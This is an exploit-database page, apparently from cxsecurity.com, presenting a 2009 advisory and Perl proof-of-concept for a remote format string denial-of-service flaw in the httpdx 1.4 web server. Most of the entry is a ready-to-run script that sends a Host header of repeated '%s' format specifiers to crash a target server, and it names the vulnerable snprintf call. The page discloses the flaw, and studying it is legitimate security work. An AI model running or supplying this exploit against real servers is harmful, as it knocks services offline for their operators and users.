httpdx web server version 1.4 Host Header remote format string denial of service

2009-09-15 / 2009-09-16
Credit: Pankaj Kohli
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# httpdx Web Server 1.4 'Host Header' Remote Format String Denial of Service PoC # # Coded by Pankaj Kohli # http://www.pank4j.com # # httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header. # The vulnerability lies in httpd_src/http.cpp in h_readrequest() : snprintf(temp[1],MAX,client->host); # use LWP; (($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 <target> <port> \n"; my $ua = new LWP::UserAgent; print "Connecting to $target on port $port\n"; my $request = new HTTP::Request('GET', "http://" . $target . ":" . $port); print "Sending evil header \n"; my $host_header = "%s"x32; $request->header('Host', $host_header); my $response = $ua->request($request); if ($response->is_success) { print "DoS Failed \n" } else { print "DoS Successful \n" }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top